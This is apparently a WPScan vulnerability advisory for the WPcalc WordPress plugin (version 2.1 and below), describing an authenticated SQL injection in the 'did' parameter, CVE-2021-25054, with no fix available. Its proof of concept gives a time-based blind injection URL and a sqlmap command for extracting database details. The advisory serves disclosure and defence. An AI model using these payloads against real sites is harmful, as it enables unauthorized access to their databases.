WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WPcalc <= 2.1 - Authenticated SQL Injection

Description

The plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection vulnerability.

Plugin author closed the plugin.

Proof of Concept

http://www.example.com/wp-admin/admin.php?page=wpcalc&info=del&did=1 AND (SELECT 7156 FROM (SELECT(SLEEP(5)))MIkl)

or, using the sqlmap tool:

./sqlmap.py -r request.txt -dbms=mysql --current-user -b -p did --batch --flush-session

Affects Plugins

wpcalc
No known fix - plugin closed

References

CVE
CVE-2021-25054

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

0xdecafbad

Verified

Yes

WPVDB ID
200969eb-e2a4-4200-82d7-0c313de089af

Timeline

Publicly Published

2021-12-06 (about 6 months ago)

Added

2021-12-09 (about 6 months ago)

Last Updated

2022-04-11 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin